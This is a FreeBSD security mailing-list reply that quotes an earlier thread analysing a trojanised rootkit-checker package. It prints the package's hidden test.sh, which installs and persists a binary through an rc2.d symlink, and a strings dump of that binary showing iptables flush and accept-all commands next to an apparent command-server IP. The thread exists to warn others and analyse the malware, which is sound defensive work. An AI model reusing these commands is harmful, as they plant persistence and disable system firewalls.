On Wed, 25 Feb 2015 20:55:43 +0000, Christopher Schulte wrote: > > On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjli...@netzkommune.com> wrote: > > > > it felt pretty scammy to me, googling for the "worm" got me to > rkcheck.org which was registered a few days ago and looks like a > tampered version of chkrootkit. I hope, nobody installed it anywhere, > it seems to execute rkcheck/tests/.unit/test.sh which contains > > > > #!/bin/bash > > > > cp tests/.unit/test /usr/bin/rrsyncn > > chmod +x /usr/bin/rrsyncn > > rm -fr /etc/rc2.d/S98rsyncn > > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > > /usr/bin/rrsyncn > > exit > > > > That doesn't look like something you'd want on your boxÿÿ > > I filed a report with Google about that domain (Google Safe > Browsing), briefly describing whatÿÿs been recounted here on this > thread. It seems quite suspicious, agreed. > > Has anyone started an analysis of the rrsyncn binary? The last few > lines of a simple string dump are interestingÿÿ take note what looks > to be an IP address of 95.215.44.195. > > /bin/sh > iptables -X 2> /dev/null > iptables -F 2> /dev/null > iptables -t nat -F 2> /dev/null > iptables -t nat -X 2> /dev/null > iptables -t mangle -F 2> /dev/null > iptables -t mangle -X 2> /dev/null > iptables -P INPUT ACCEPT 2> /dev/null > iptables -P FORWARD ACCEPT 2> /dev/null > iptables -P OUTPUT ACCEPT 2> /dev/null > udevd > 95.215.44.195 > ;*3$" > > > Cheers, > > > > Philip > > Chris
Seeing as noone's mentioned it yet .. if your (linux) box were running iptables - a reasonable assumption - then running those commands would remove and flush all your rules, leaving you with a firewall that accepted everything, as good as no firewall at all. And then .. ? At least FreeBSD isn't the lowest hanging fruit for these monkeys .. cheers, Ian _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
